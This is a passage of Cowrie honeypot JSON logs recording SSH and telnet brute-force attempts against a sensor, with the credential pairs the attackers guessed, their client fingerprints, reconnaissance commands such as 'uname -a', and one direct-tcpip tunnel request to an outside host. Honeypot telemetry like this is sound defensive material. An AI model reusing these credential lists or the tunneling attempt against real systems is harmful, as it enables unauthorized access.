21","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T18:40:39.467265Z","src_ip":"212.227.235.229","session":"34021282b15b"}
{"eventid":"cowrie.login.failed","username":"sol","password":"1","message":"login attempt [sol/1] failed","sensor":"my-vps","timestamp":"2025-08-28T18:40:39.787700Z","src_ip":"212.227.235.229","session":"34021282b15b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:40:40.896248Z","src_ip":"212.227.235.229","session":"34021282b15b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64122,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c0bfecb0abb","protocol":"ssh","message":"New connection: 217.72.205.35:64122 (1.2.3.4:22) [session: 0c0bfecb0abb]","sensor":"my-vps","timestamp":"2025-08-28T18:41:28.213334Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:41:28.214468Z","src_ip":"217.72.205.35","session":"0c0bfecb0abb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47135,"dst_ip":"1.2.3.4","dst_port":23,"session":"a9c386f0e28f","protocol":"telnet","message":"New connection: 212.227.125.160:47135 (1.2.3.4:23) [session: a9c386f0e28f]","sensor":"my-vps","timestamp":"2025-08-28T18:42:31.175929Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52522,"dst_ip":"1.2.3.4","dst_port":22,"session":"997f91087533","protocol":"ssh","message":"New connection: 212.227.235.229:52522 (1.2.3.4:22) [session: 997f91087533]","sensor":"my-vps","timestamp":"2025-08-28T18:43:46.164132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:43:46.165800Z","src_ip":"212.227.235.229","session":"997f91087533"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T18:43:46.268784Z","src_ip":"212.227.235.229","session":"997f91087533"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:43:46.580023Z","src_ip":"212.227.235.229","session":"997f91087533"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:43:46.804451Z","src_ip":"212.227.235.229","session":"997f91087533"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T18:43:46.805129Z","src_ip":"212.227.235.229","session":"997f91087533"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:43:46.909810Z","src_ip":"212.227.235.229","session":"997f91087533"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:43:46.910933Z","src_ip":"212.227.235.229","session":"997f91087533"}
{"eventid":"cowrie.session.closed","duration":120.01532244682312,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:44:31.191169Z","src_ip":"212.227.125.160","session":"a9c386f0e28f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58158,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3db5506d7be","protocol":"ssh","message":"New connection: 212.227.235.229:58158 (1.2.3.4:22) [session: b3db5506d7be]","sensor":"my-vps","timestamp":"2025-08-28T18:45:16.872382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:45:16.873333Z","src_ip":"212.227.235.229","session":"b3db5506d7be"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T18:45:16.976483Z","src_ip":"212.227.235.229","session":"b3db5506d7be"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"db:f5:b6:16:a4:f3:fa:b9:6e:1d:f6:81:4b:93:c1:eb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMz+Ulu3JyFz/HI5BR505eiUoJhtTDYvVt6i9SXXaNkKvN02t47vxhpOgKz/dTDubYAdJKKjv/z1D/jKEWgerAjkCIF2DEjTtgbZU/xsJBu4wqLsmvhDazjxKEhacNbcbm+r/FNov2BbVclgb48n5KJgjRwsWXzhwjrhsV19lEQ6qQRH6AIYdxxQgX3yeoN/fjYXleS4N9Y70JO+77yPwjCl8Z2BVGs/qGVJMBahFAK5NWyN2x/hefEEb2uXUP5tTeDfugeJm67iIRtO+6fseWhqQgeKxJd3vjOMT9TOPCKKKdoVNNTP3iZL9TaTEQcYqb9LCaJgpzHxiDWopxtvmz","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint db:f5:b6:16:a4:f3:fa:b9:6e:1d:f6:81:4b:93:c1:eb","sensor":"my-vps","timestamp":"2025-08-28T18:45:17.180579Z","src_ip":"212.227.235.229","session":"b3db5506d7be"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"db:f5:b6:16:a4:f3:fa:b9:6e:1d:f6:81:4b:93:c1:eb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMz+Ulu3JyFz/HI5BR505eiUoJhtTDYvVt6i9SXXaNkKvN02t47vxhpOgKz/dTDubYAdJKKjv/z1D/jKEWgerAjkCIF2DEjTtgbZU/xsJBu4wqLsmvhDazjxKEhacNbcbm+r/FNov2BbVclgb48n5KJgjRwsWXzhwjrhsV19lEQ6qQRH6AIYdxxQgX3yeoN/fjYXleS4N9Y70JO+77yPwjCl8Z2BVGs/qGVJMBahFAK5NWyN2x/hefEEb2uXUP5tTeDfugeJm67iIRtO+6fseWhqQgeKxJd3vjOMT9TOPCKKKdoVNNTP3iZL9TaTEQcYqb9LCaJgpzHxiDWopxtvmz","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T18:45:17.181277Z","src_ip":"212.227.235.229","session":"b3db5506d7be"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"db:f5:b6:16:a4:f3:fa:b9:6e:1d:f6:81:4b:93:c1:eb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMz+Ulu3JyFz/HI5BR505eiUoJhtTDYvVt6i9SXXaNkKvN02t47vxhpOgKz/dTDubYAdJKKjv/z1D/jKEWgerAjkCIF2DEjTtgbZU/xsJBu4wqLsmvhDazjxKEhacNbcbm+r/FNov2BbVclgb48n5KJgjRwsWXzhwjrhsV19lEQ6qQRH6AIYdxxQgX3yeoN/fjYXleS4N9Y70JO+77yPwjCl8Z2BVGs/qGVJMBahFAK5NWyN2x/hefEEb2uXUP5tTeDfugeJm67iIRtO+6fseWhqQgeKxJd3vjOMT9TOPCKKKdoVNNTP3iZL9TaTEQcYqb9LCaJgpzHxiDWopxtvmz","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint db:f5:b6:16:a4:f3:fa:b9:6e:1d:f6:81:4b:93:c1:eb","sensor":"my-vps","timestamp":"2025-08-28T18:45:17.283222Z","src_ip":"212.227.235.229","session":"b3db5506d7be"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"db:f5:b6:16:a4:f3:fa:b9:6e:1d:f6:81:4b:93:c1:eb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMz+Ulu3JyFz/HI5BR505eiUoJhtTDYvVt6i9SXXaNkKvN02t47vxhpOgKz/dTDubYAdJKKjv/z1D/jKEWgerAjkCIF2DEjTtgbZU/xsJBu4wqLsmvhDazjxKEhacNbcbm+r/FNov2BbVclgb48n5KJgjRwsWXzhwjrhsV19lEQ6qQRH6AIYdxxQgX3yeoN/fjYXleS4N9Y70JO+77yPwjCl8Z2BVGs/qGVJMBahFAK5NWyN2x/hefEEb2uXUP5tTeDfugeJm67iIRtO+6fseWhqQgeKxJd3vjOMT9TOPCKKKdoVNNTP3iZL9TaTEQcYqb9LCaJgpzHxiDWopxtvmz","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T18:45:17.283943Z","src_ip":"212.227.235.229","session":"b3db5506d7be"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:45:26.872166Z","src_ip":"212.227.235.229","session":"b3db5506d7be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41075,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb295fe082f2","protocol":"ssh","message":"New connection: 212.227.235.229:41075 (1.2.3.4:22) [session: eb295fe082f2]","sensor":"my-vps","timestamp":"2025-08-28T18:45:32.080152Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:45:32.081307Z","src_ip":"212.227.235.229","session":"eb295fe082f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41441,"dst_ip":"1.2.3.4","dst_port":22,"session":"9aab785b2983","protocol":"ssh","message":"New connection: 212.227.235.229:41441 (1.2.3.4:22) [session: 9aab785b2983]","sensor":"my-vps","timestamp":"2025-08-28T18:45:32.243856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:45:32.244732Z","src_ip":"212.227.235.229","session":"9aab785b2983"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T18:45:32.406529Z","src_ip":"212.227.235.229","session":"9aab785b2983"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:45:32.893052Z","src_ip":"212.227.235.229","session":"9aab785b2983"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T18:45:33.055921Z","session":"9aab785b2983"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35078,"dst_ip":"1.2.3.4","dst_port":22,"session":"17bd397ea5f0","protocol":"ssh","message":"New connection: 212.227.235.229:35078 (1.2.3.4:22) [session: 17bd397ea5f0]","sensor":"my-vps","timestamp":"2025-08-28T18:45:35.368510Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:45:35.488891Z","src_ip":"212.227.235.229","session":"17bd397ea5f0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T18:45:35.490951Z","src_ip":"212.227.235.229","session":"17bd397ea5f0"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"password","message":"login attempt [ubuntu/password] failed","sensor":"my-vps","timestamp":"2025-08-28T18:45:36.816557Z","src_ip":"212.227.235.229","session":"17bd397ea5f0"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:45:38.191647Z","src_ip":"212.227.235.229","session":"17bd397ea5f0"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":46838,"dst_ip":"1.2.3.4","dst_port":22,"session":"e904d0034560","protocol":"ssh","message":"New connection: 186.225.142.90:46838 (1.2.3.4:22) [session: e904d0034560]","sensor":"my-vps","timestamp":"2025-08-28T18:45:39.345802Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:45:39.347344Z","src_ip":"186.225.142.90","session":"e904d0034560"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T18:45:39.541203Z","src_ip":"186.225.142.90","session":"e904d0034560"}
{"eventid":"cowrie.login.success","username":"root","password":"102030%","message":"login attempt [root/102030%] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:45:40.119980Z","src_ip":"186.225.142.90","session":"e904d0034560"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:45:40.524070Z","src_ip":"186.225.142.90","session":"e904d0034560"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T18:45:40.524741Z","src_ip":"186.225.142.90","session":"e904d0034560"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:45:40.716380Z","src_ip":"186.225.142.90","session":"e904d0034560"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:45:40.717490Z","src_ip":"186.225.142.90","session":"e904d0034560"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:46:42.248073Z","src_ip":"212.227.235.229","session":"9aab785b2983"}
{"eventid":"cowrie.session.connect","src_ip":"178.128.19.249","src_port":53682,"dst_ip":"1.2.3.4","dst_port":23,"session":"695f5b99f074","protocol":"telnet","message":"New connection: 178.128.19.249:53682 (1.2.3.4:23) [session: 695f5b99f074]","sensor":"my-vps","timestamp":"2025-08-28T18:46:58.862572Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T18:47:00.446280Z","src_ip":"178.128.19.249","session":"695f5b99f074"}
{"eventid":"cowrie.session.closed","duration":3.6249136924743652,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:47:02.487422Z","src_ip":"178.128.19.249","session":"695f5b99f074"}
{"eventid":"cowrie.session.connect","src_ip":"178.128.19.249","src_port":57028,"dst_ip":"1.2.3.4","dst_port":23,"session":"e1fb550e659e","protocol":"telnet","message":"New connection: 178.128.19.249:57028 (1.2.3.4:23) [session: e1fb550e659e]","sensor":"my-vps","timestamp":"2025-08-28T18:47:02.659047Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T18:47:03.944376Z","src_ip":"178.128.19.249","session":"e1fb550e659e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T18:47:03.960646Z","src_ip":"178.128.19.249","session":"e1fb550e659e"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T18:47:04.184858Z","src_ip":"178.128.19.249","session":"e1fb550e659e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:47:05.319677Z","src_ip":"178.128.19.249","session":"e1fb550e659e"}
{"eventid":"cowrie.session.closed","duration":2.663712501525879,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T18:47:05.322706Z","src_ip":"178.128.19.249","session":"e1fb550e659e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47550,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb0d3ee4efc6","protocol":"ssh","message":"New connection: 212.227.235.229:47550 (1.2.3.4:22) [session: eb0d3ee4efc6]","sensor":"my-vps","timestamp":"2025-08-28T18:47:05.575057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T18:47:05.576222Z","src_ip":"212.227.235.229","session":"eb0d3ee4efc6"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T18:47:05.681809Z","src_ip":"212.227.235.229","session":"eb0d3ee4efc6"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T18:47:05.998987Z","src_ip":"212.227.235.229","session":"eb0d3ee4efc6"}
